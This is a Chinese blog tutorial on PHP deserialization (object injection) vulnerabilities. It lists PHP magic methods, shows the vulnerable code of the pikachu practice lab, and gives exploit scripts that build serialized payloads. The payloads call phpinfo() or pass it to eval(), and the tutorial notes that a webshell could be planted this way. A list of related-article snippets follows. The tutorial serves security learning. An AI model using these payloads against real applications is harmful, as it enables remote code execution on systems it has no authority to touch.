PHP反序列化

最新推荐文章于 2022-08-31 08:22:29 发布
最新推荐文章于 2022-08-31 08:22:29 发布
阅读量155 收藏
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51822230/article/details/115518374
版权

引用文章

大佬写的,建议直接看他的
作者:Keefe

PHP反序列化和序列化方法

php用serializeunserialize着两个函数进行序列化和反序列化

序列化的含义为:将类与对象转换为可以存储的值,可以储存在任何地方,而且不会破坏类型和结构。

反序列化的含义为:将字符串转化为php值。

魔术函数触发条件

__construct 当一个对象创建时被调用,
__destruct 当一个对象销毁时被调用,
__toString 当一个对象被当作一个字符串被调用。
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__destruct() 对象被销毁时触发
__call() 在对象上下文中调用不可访问的方法时触发
__callStatic() 在静态上下文中调用不可访问的方法时触发
__get() 用于从不可访问的属性读取数据
__set() 用于将数据写入不可访问的属性
__isset() 在不可访问的属性上调用isset()或empty()触发
__unset() 在不可访问的属性上使用unset()时触发
__toString() 把类当作字符串使用时触发,返回值需要为字符串
__invoke() 当脚本尝试将对象调用为函数时触发

利用方式举例

我们用pikachu靶机里的源代码做一个演示。

class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}

$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>"; 
    }

这是一个有类的php反序列化,由post方式提交表单。

我们在这里构造一个恶意代码phpinfo()

<?php
class S{
    var $test = "phpinfo()";
    function __construct(){
        echo $this->test;
    }
}
$a = new S;
$b = serialize($a);
print $b;
?>

在这里插入图片描述
得到字符串,在靶机里面进行输入。
得到结果:

在这里插入图片描述
当然我们这里只是显示test变量,如果是eval 函数的话就可以植入一句话木马等等恶意代码。

利用php反序列化条件

1.反序列化的参数是可控的
2.执行危险函数的路径可达

我们看一下这个例子,从一位博主那借鉴过来的。

    <?php
    class lemon {
        protected $ClassObj;

        function __construct() {
            $this->ClassObj = new normal();
        }

        function __destruct() {
            $this->ClassObj->action();
        }
    }

    class normal {
        function action() {
            echo "hello";
        }
    }

    class evil {
        private $data;
        function action() {
            eval($this->data);
        }
    }

    unserialize($_GET['d']);
    ?>

参数可控很好理解,就是通过get方式传参然后控制反序列化后的参数传递。

路径可达其实就是我们可以利用危险函数。比如这里,因为我们__destruct函数指向action函数,而normal和evil都有action。我们就可以把__construct函数新创建的类改为我们的evil类。从而执行eval()。

这是序列化的exp

    <?php
    class lemon {
        protected $ClassObj;
        function __construct() {
            $this->ClassObj = new evil();
        }
    }
    class evil {
        private $data = "phpinfo();";

    }
    echo urlencode(serialize(new lemon()));
    ?>

一定要进行一个url加密,不然payload出来是错的。

hsxiaowu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原理+实践学习(PHP反序列化和Session反序列化)
Lemon's blog
05-04 3025
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞。 一、PHP序列化和反序列化 在学习PHP反序列化漏洞时,先来了解一下基础的知识。 (一)PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的...
PHP反序列化初探
u011215939的博客
03-20 363
PHP反序列化初探 php序列化是什么? 在反序列化之前,先来看看php序列化是什么样的,php序列化和反序列化由serialize()和unserialize()这两个函数进行相互转化的,简单的说就是serialize()将一串字符串、数组、对象进行格式化处理,然后再有unserialize()函数将格式化处理后的字符串、数组进行还原; 代码: <?php $str = "this ...
php+反序列化方法,PHP序列化反序列化的方法详解
weixin_33242139的博客
03-19 158
在一些开源的php源代码中,我们经常看到一些配置文件里面存放的是一些类似带有格式的变量名称和值。刚开始还不明白这个是怎么回事儿。后来才知道这个是为了将一个复杂(也可能并不那么复杂)的数据结构转换成一个字符串,以便于保存和传递。其实就是一个序列化的过程,在需要用到这些数据库的时候会进行一个反序列化过程,就是将这个字符串再还原成他原来的数据结构。下面说说 php 如何进行数据的序列化和反序列化的。ph...
PHP反序列化和魔术方法
东方
09-18 1681
文章目录概念相关函数 概念 概念和开发一样 相关函数 这两个函数是特征之一; 序列化的含义: o 是对象(数组反序列化的话 是 a) 4 是对象长度, 之后名字, 2 是变量个数, s代表字符串, 3 代表个数,后面 也是 一样的。 反序列化过程中 ,可控点只有变量,函数 不可控。 局限性在于 其中的 function 函数。函数没有危害性的话 漏洞也没有,或者xss之类...
PHP序列化与反序列化
qq_53142368的博客
05-16 369
文章目录一、php反序列化漏洞1.概述2.php序列化与反序列化二、1.2.读入数据总结 一、php反序列化漏洞 1.概述 php反序列化漏洞,又叫php对象注入漏洞。 什么是php反序列化漏洞呢?简单的来说,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没.
详解php反序列化
12-17
PHP反序列化是一种将之前通过序列化保存的字符串还原成原始数据结构的技术。在PHP中,`serialize()`函数用于将变量转化为可存储或传输的字符串形式,而`unserialize()`函数则相反,它将字符串还原为原来的变量。这两...
php反序列化例题.docx
最新发布
07-18
PHP 反序列化详解 PHP 反序列化是指将序列化的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列化和反序列化的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 反序列化的过程...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
PHP常见的序列化与反序列化操作实例分析
10-16
PHP编程中,序列化和反序列化是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
php反序列化学习
qq_51233573的博客
01-24 449
❤何为php反序列化 序列化把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式,而反序列化就是把序列化的数据,转换成我们需要的格式,序列化和反序列化互为逆过程 php反序列化本身不危险,但是反序列化过程中,传入的参数可以被外部用户控制就会造成很大的危害。 ❤php类可能会包含一些特殊的函数,名为magic函数,magic函数命名是以符号“__”开头的,比如__construct, __destruct,__toString, __sleep, __wakeup,这些函数在某些情况下会自动
php 序列化与反序列化
天空之城
10-09 7607
简介 在php中,序列化用与存储或传递php的值的过程,同时不丢失其结构和数据类型。 相关的函数包括serialize、unserialize,魔术方法包括__sleep、__wakeup。 序列化 语法:string serialize ( mixed $value ) 可以对String、Integer、Boolean、Null、Array、Object进行操作 反序列化 语法:mi...
CTFshow-php反序列化
weixin_47813861的博客
08-28 580
详解wp可参考此处 该博客仅提供大致内容,还望包涵。 web255 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){
PHP之序列化与反序列化(基础篇)
errorr0
03-10 2495
最最最基础的序列化与反序列化
PHP中序列化与反序列化
热门推荐
迷风小白
06-28 1万+
PHP序列化:serialize 序列化是将变量或对象转换成字符串的过程。 举例: <?php class man{ public $name; public $age; public $height; function __construct($name,$age,$height){ //_construct:创建对象时初始化 $this->name =...
谈一谈PHP反序列化
Lethe's Blog
08-07 1405
0x01 基础知识 PHP序列化:php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。 PHP反序列化:将被压缩为字符串的复杂数据结构,重新恢复,使用unserialize()函数。 PHP反序列化漏洞:如果代码中使用了反序列化 unserialize()函数,并且参数可控,且程序没有对用户输入的反序列化字符串进行校验,那么可以通过在...
Netty(11)序列化/反序列化、Netty参数
учёба
08-31 553
序列化,反序列化、netty参数
php反序列化
05-24
PHP反序列化是指将序列化的数据还原为对象或数组的过程。在PHP中,我们可以使用序列化和反序列化来实现对象的持久化,即将对象保存到文件或数据库中,并在需要时还原为对象。反序列化可以通过unserialize()函数来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值